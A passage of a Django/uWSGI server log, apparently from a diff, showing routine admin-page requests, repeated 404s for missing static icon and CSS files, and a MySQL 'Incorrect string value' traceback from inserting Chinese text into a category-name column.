/static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3678 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/themify-icons/themify-icons.css +[pid: 2069|app: 0|req: 427/547] 219.228.146.146 () {38 vars in 833 bytes} [Thu Jan 14 07:56:30 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3594 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +[pid: 2069|app: 0|req: 427/548] 219.228.146.146 () {38 vars in 849 bytes} [Thu Jan 14 07:56:30 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3618 bytes in 32 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css +[pid: 2069|app: 0|req: 428/549] 219.228.146.146 () {38 vars in 833 bytes} [Thu Jan 14 07:56:30 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3594 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/css/animate.css +[pid: 2069|app: 0|req: 429/550] 219.228.146.146 () {38 vars in 779 bytes} [Thu Jan 14 07:56:30 2021] GET /static/css/animate.css => generated 3513 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/css/spinners.css +[pid: 2069|app: 0|req: 430/551] 219.228.146.146 () {38 vars in 781 bytes} [Thu Jan 14 07:56:30 2021] GET /static/css/spinners.css => generated 3516 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +[pid: 2069|app: 0|req: 431/552] 219.228.146.146 () {40 vars in 904 bytes} [Thu Jan 14 07:56:34 2021] GET /kind-manage/? => generated 8286 bytes in 8 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +Internal Server Error: /kind-manage/ +Traceback (most recent call last): + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute + return self.cursor.execute(query, args) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute + result = self._query(query) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query + conn.query(q) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query + self._affected_rows = self._read_query_result(unbuffered=unbuffered) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result + result.read() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read + first_packet = self.connection._read_packet() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet + packet.raise_for_error() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error + err.raise_mysql_exception(self._data) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception + raise errorclass(errno, errval) +pymysql.err.DataError: (1366, "Incorrect string value: '\\xE8\\xBF\\x90\\xE5\\x8A\\xA8...' for column 'k_name' at row 1") + +The above exception was the direct cause of the following exception: + +Traceback (most recent call last): + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/exception.py", line 47, in inner + response = get_response(request) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/base.py", line 181, in _get_response + response = wrapped_callback(request, *callback_args, **callback_kwargs) + File "./app01/views.py", line 541, in kind_manage + models.Kind.objects.create(k_name=k_name) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method + return getattr(self.get_queryset(), name)(*args, **kwargs) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 447, in create + obj.save(force_insert=True, using=self.db) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 754, in save + force_update=force_update, update_fields=update_fields) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 792, in save_base + force_update, using, update_fields, + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 895, in _save_table + results = self._do_insert(cls._base_manager, using, fields, returning_fields, raw) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 935, in _do_insert + using=using, raw=raw, + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method + return getattr(self.get_queryset(), name)(*args, **kwargs) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 1254, in _insert + return query.get_compiler(using=using).execute_sql(returning_fields) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/sql/compiler.py", line 1397, in execute_sql + cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 98, in execute + return super().execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 66, in execute + return self._execute_with_wrappers(sql, params, many=False, executor=self._execute) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 75, in _execute_with_wrappers + return executor(sql, params, many, context) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/utils.py", line 90, in __exit__ + raise dj_exc_value.with_traceback(traceback) from exc_value + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute + return self.cursor.execute(query, args) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute + result = self._query(query) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query + conn.query(q) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query + self._affected_rows = self._read_query_result(unbuffered=unbuffered) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result + result.read() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read + first_packet = self.connection._read_packet() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet + packet.raise_for_error() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error + err.raise_mysql_exception(self._data) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception + raise errorclass(errno, errval) +django.db.utils.DataError: (1366, "Incorrect string value: '\\xE8\\xBF\\x90\\xE5\\x8A\\xA8...' for column 'k_name' at row 1") +[pid: 2069|app: 0|req: 432/553] 219.228.146.146 () {48 vars in 986 bytes} [Thu Jan 14 07:56:34 2021] POST /kind-manage/ => generated 207198 bytes in 117 msecs (HTTP/1.1 500) 6 headers in 187 bytes (1 switches on core 0) +Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css +[pid: 2069|app: 0|req: 433/554] 219.228.146.146 () {38 vars in 845 bytes} [Thu Jan 14 07:56:34 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3612 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css +[pid: 2069|app: 0|req: 434/555] 219.228.146.146 () {38 vars in 849 bytes} [Thu Jan 14 07:56:34 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3618 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css +[pid: 2069|app: 0|req: 435/556] 219.228.146.146 () {38 vars in 857 bytes} [Thu Jan 14 07:56:34 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3630 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/linea-icons/linea.css +[pid: 2069|app: 0|req: 436/557] 219.228.146.146 () {38 vars in 813 bytes} [Thu Jan 14 07:56:34 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3564 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css +[pid: 2069|app: 0|req: 437/558] 219.228.146.146 () {38 vars in 833 bytes} [Thu Jan 14 07:56:34 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3594 bytes in 5 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/themify-icons/themify-icons.css +[pid: 2069|app: 0|req: 438/559] 219.228.146.146 () {38 vars in 833 bytes} [Thu Jan 14 07:56:34 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3594 bytes in 26 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css +[pid: 2069|app: 0|req: 439/560] 219.228.146.146 () {38 vars in 889 bytes} [Thu Jan 14 07:56:34 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3678 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/css/spinners.css +[pid: 2069|app: 0|req: 440/561] 219.228.146.146 () {38 vars in 781 bytes} [Thu Jan 14 07:56:34 2021] GET /static/css/spinners.css => generated 3516 bytes in 5 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/css/animate.css +[pid: 2069|app: 0|req: 441/562] 219.228.146.146 () {38 vars in 779 bytes} [Thu Jan 14 07:56:34 2021] GET /static/css/animate.css => generated 3513 bytes in 5 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +[pid: 2069|app: 0|req: 442/563] 219.228.146.146 () {42 vars in 936 bytes} [Thu Jan 14 07:56:37 2021] GET /kind-manage/? => generated 8286 bytes in 9 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css +[pid: 2069|app: 0|req: 443/564] 219.228.146.146 () {38 vars in 846 bytes} [Thu Jan 14 07:56:37 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3612 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/linea-icons/linea.css +[pid: 2069|app: 0|req: 444/565] 219.228.146.146 () {38 vars in 814 bytes} [Thu Jan 14 07:56:37 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3564 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css +[pid: 2069|app: 0|req: 445/566] 219.228.146.146 () {38 vars in 858 bytes} [Thu Jan 14 07:56:37 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3630 bytes in 11 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css +[pid: 2069|app: 0|req: 446/567] 219.228.146.146 () {38 vars in 834 bytes} [Thu Jan 14 07:56:37 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3594 bytes in 11 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/themify-icons/themify-icons.css +[pid: 2069|app: 0|req: 447/568] 219.228.146.146 () {38 vars in 834 bytes} [Thu Jan 14 07:56:37 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3594 bytes in 10 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css +[pid: 2069|app: 0|req: 448/569] 219.228.146.146 () {38 vars in 890 bytes} [Thu Jan 14 07:56:37 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3678 bytes in 11 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css +[pid: 2069|app: 0|req: 449/570] 219.228.146.146 () {38 vars in 850 bytes} [Thu Jan 14 07:56:37 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3618 bytes in 43 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/css/spinners.css +[pid: 2069|app: 0|req: 450/571] 219.228.146.146 () {38 vars in 782 bytes} [Thu Jan 14 07:56:37 2021] GET /static/css/spinners.css => generated 3516 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/css/animate.css +[pid: 2069|app: 0|req: 451/572] 219.228.146.146 () {38 vars in 780 bytes} [Thu Jan 14 07:56:38 2021] GET /static/css/animate.css => generated 3513 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +[pid: 2069|app: 0|req: 452/573] 219.228.146.146 () {40 vars in 907 bytes} [Thu Jan 14 07:56:39 2021] GET /announcement/ => generated 8247 bytes in 8 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css +[pid: 2069|app: 0|req: 453/574] 219.228.146.146 () {38 vars in 846 bytes} [Thu Jan 14 07:56:39 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3612 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css +[pid: 2069|app: 0|req: 454/575] 219.228.146.146 () {38 vars in 858 bytes} [Thu Jan 14 07:56:39 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3630 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css +[pid: 2069|app: 0|req: 455/576] 219.228.146.146 () {38 vars in 850 bytes} [Thu Jan 14 07:56:39 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3618 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/linea-icons/linea.css +[pid: 2069|app: 0|req: 456/577] 219.228.146.146 () {38 vars in 814 bytes} [Thu Jan 14 07:56:39 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3564 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css +[pid: 2069|app: 0|req: 457/578] 219.228.146.146 () {38 vars in 834 bytes} [Thu Jan 14 07:56:39 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3594 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/themify-icons/themify-icons.css +[pid: 2069|app: 0|req: 458/579] 219.228.146.146 () {38 vars in 834 bytes} [Thu Jan 14 07:56:39 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3594 bytes in 27 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css +[pid: 2069|app: 0|req: 459/580] 219.228.146.146 () {38 vars in 890 bytes} [Thu Jan 14 07:56:39 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3678 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/css/spinners.css +[pid: 2069|app: 0|req: 460/581] 219.228.146.146 () {38 vars in 782 bytes} [Thu Jan 14 07:56:39 2021] GET /static/css/spinners.css => generated 3516 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/css/animate.css +[pid: 2069|app: 0|req: 461/582] 219.228.146.146 () {38 vars in 780 bytes} [Thu Jan 14 07:56:39 2021] GET /static/css/animate.css => generated 3513 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +[pid: 2069|app: 0|req: 462/583] 219.228.146.146 () {40 vars in 905 bytes} [Thu Jan 14 07:56:41 2021] GET /kind-manage/ => generated 8286 bytes in 9 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css +[pid: 2069|app: 0|req: 463/584] 219.228.146.146 () {38 vars in 846 bytes} [Thu Jan 14 07:56:41 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3612 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css +[pid: 2069|app: 0|req: 464/585] 219.228.146.146 () {38 vars in 850 bytes} [Thu Jan 14 07:56:41 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3618 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css +[pid: 2069|app: 0|req: 465/586] 219.228.146.146 () {38 vars in 858 bytes} [Thu Jan 14 07:56:41 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3630 bytes in 5 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/linea-icons/linea.css +[pid: 2069|app: 0|req: 466/587] 219.228.146.146 () {38 vars in 814 bytes} [Thu Jan 14 07:56:41 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3564 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css +[pid: 2069|app: 0|req: 467/588] 219.228.146.146 () {38 vars in 834 bytes} [Thu Jan 14 07:56:41 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3594 bytes in 5 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/themify-icons/themify-icons.css +[pid: 2069|app: 0|req: 468/589] 219.228.146.146 () {38 vars in 834 bytes} [Thu Jan 14 07:56:41 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3594 bytes in 13 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css +[pid: 2069|app: 0|req: 469/590] 219.228.146.146 () {38 vars in 890 bytes} [Thu Jan 14 07:56:41 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3678 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/css/spinners.css +[pid: 2069|app: 0|req: 470/591] 219.228.146.146 () {38 vars in 782 bytes} [Thu Jan 14 07:56:42 2021] GET /static/css/spinners.css => generated 3516 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/css/animate.css +[pid: 2069|app: 0|req: 471/592] 219.228.146.146 () {38 vars in 780 bytes} [Thu Jan 14 07:56:42 2021] GET /static/css/animate.css => generated 3513 bytes in 5 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +[pid: 2069|app: 0|req: 472/593] 219.228.146.7 () {38 vars in 862 bytes} [Thu Jan 14 07:56:49 2021] GET /login/ => generated 6428 bytes in 2 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 2069|app: 0|req: 473/594] 219.228.146.7 () {48 vars in 1006 bytes} [Thu Jan 14 07:56:52 2021] POST /login/ => generated 82 bytes in 5 msecs (HTTP/1.1 200) 5 headers in 165 bytes (1 switches on core 0) +[pid: 2069|app: 0|req: 474/595] 219.228.146.7 () {40 vars in 919 bytes} [Thu Jan 14 07:57:00 2021] GET /my-admin/ => generated 5366 bytes in 2 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +Not Found: /favicon.ico +[pid: 2069|app: 0|req: 475/596] 219.228.146.7 () {38 vars in 806 bytes} [Thu Jan 14 07:57:00 2021] GET /favicon.ico => generated 3480 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +[pid: 2069|app: 0|req: 476/597] 219.228.146.7 () {48 vars in 1016 bytes} [Thu Jan 14 07:57:02 2021] POST /my-admin/ => generated 27 bytes in 20 msecs (HTTP/1.1 200) 7 headers in 324 bytes (1 switches on core 1) +[pid: 2069|app: 0|req: 477/598] 219.228.146.7 () {40 vars in 926 bytes} [Thu Jan 14 07:57:02 2021] GET /admin-home/ => generated 6515 bytes in 9 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css +[pid: 2069|app: 0|req: 478/599] 219.228.146.7 () {38 vars in 884 bytes} [Thu Jan 14 07:57:02 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3612 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css +[pid: 2069|app: 0|req: 479/600] 219.228.146.7 () {38 vars in 888 bytes} [Thu Jan 14 07:57:02 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3618 bytes in 10 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css +[pid: 2069|app: 0|req: 480/601] 219.228.146.7 () {38 vars in 896 bytes} [Thu Jan 14 07:57:02 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3630 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/themify-icons/themify-icons.css +[pid: 2069|app: 0|req: 481/602] 219.228.146.7 () {38 vars in 872 bytes} [Thu Jan 14 07:57:02 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3594 bytes in 10 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css +[pid: 2069|app: 0|req: 482/603] 219.228.146.7 () {38 vars in 872 bytes} [Thu Jan 14 07:57:02 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3594 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/linea-icons/linea.css +[pid: 2069|app: 0|req: 483/604] 219.228.146.7 () {38 vars in 852 bytes} [Thu Jan 14 07:57:02 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3564 bytes in 39 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css +[pid: 2069|app: 0|req: 484/605] 219.228.146.7 () {38 vars in 928 bytes} [Thu Jan 14 07:57:02 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3678 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/css/animate.css +[pid: 2069|app: 0|req: 485/606] 219.228.146.7 () {38 vars in 818 bytes} [Thu Jan 14 07:57:02 2021] GET /static/css/animate.css => generated 3513 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/css/spinners.css +[pid: 2069|app: 0|req: 486/607] 219.228.146.7 () {38 vars in 820 bytes} [Thu Jan 14 07:57:02 2021] GET /static/css/spinners.css => generated 3516 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +[pid: 2069|app: 0|req: 487/608] 219.228.146.7 () {40 vars in 930 bytes} [Thu Jan 14 07:57:07 2021] GET /kind-manage/ => generated 8286 bytes in 8 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css +[pid: 2069|app: 0|req: 488/609] 219.228.146.7 () {38 vars in 884 bytes} [Thu Jan 14 07:57:07 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3612 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css +[pid: 2069|app: 0|req: 489/610] 219.228.146.7 () {38 vars in 896 bytes} [Thu Jan 14 07:57:07 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3630 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css +[pid: 2069|app: 0|req: 490/611] 219.228.146.7 () {38 vars in 888 bytes} [Thu Jan 14 07:57:07 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3618 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/linea-icons/linea.css +[pid: 2069|app: 0|req: 491/612] 219.228.146.7 () {38 vars in 852 bytes} [Thu Jan 14 07:57:07 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3564 bytes in 5 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/themify-icons/themify-icons.css +[pid: 2069|app: 0|req: 492/613] 219.228.146.7 () {38 vars in 872 bytes} [Thu Jan 14 07:57:07 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3594 bytes in 5 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css +[pid: 2069|app: 0|req: 493/614] 219.228.146.7 () {38 vars in 872 bytes} [Thu Jan 14 07:57:07 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3594 bytes in 14 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css +[pid: 2069|app: 0|req: 494/615] 219.228.146.7 () {38 vars in 928 bytes} [Thu Jan 14 07:57:07 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3678 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/css/spinners.css +[pid: 2069|app: 0|req: 495/616] 219.228.146.7 () {38 vars in 820 bytes} [Thu Jan 14 07:57:07 2021] GET /static/css/spinners.css => generated 3516 bytes in 10 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/css/animate.css +[pid: 2069|app: 0|req: 496/617] 219.228.146.7 () {38 vars in 818 bytes} [Thu Jan 14 07:57:07 2021] GET /static/css/animate.css => generated 3513 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +[pid: 2069|app: 0|req: 497/618] 219.228.146.7 () {48 vars in 1025 bytes} [Thu Jan 14 07:57:10 2021] POST /kind-manage/ => generated 27 bytes in 13 msecs (HTTP/1.1 200) 6 headers in 179 bytes (1 switches on core 0) +[pid: 2069|app: 0|req: 498/619] 219.228.146.7 () {40 vars in 931 bytes} [Thu Jan 14 07:57:10 2021] GET /kind-manage/ => generated 7353 bytes in 9 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css +[pid: 2069|app: 0|req: 499/620] 219.228.146.7 () {38 vars in 884 bytes} [Thu Jan 14 07:57:11 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3612 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css +[pid: 2069|app: 0|req: 500/621] 219.228.146.7 () {38 vars in 896 bytes} [Thu Jan 14 07:57:11 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3630 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css +[pid: 2069|app: 0|req: 501/622] 219.228.146.7 () {38 vars in 888 bytes} [Thu Jan 14 07:57:11 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3618 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/linea-icons/linea.css +[pid: 2069|app: 0|req: 502/623] 219.228.146.7 () {38 vars in 852 bytes} [Thu Jan 14 07:57:11 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3564 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/themify-icons/themify-icons.css +[pid: 2069|app: 0|req: 503/624] 219.228.146.7 () 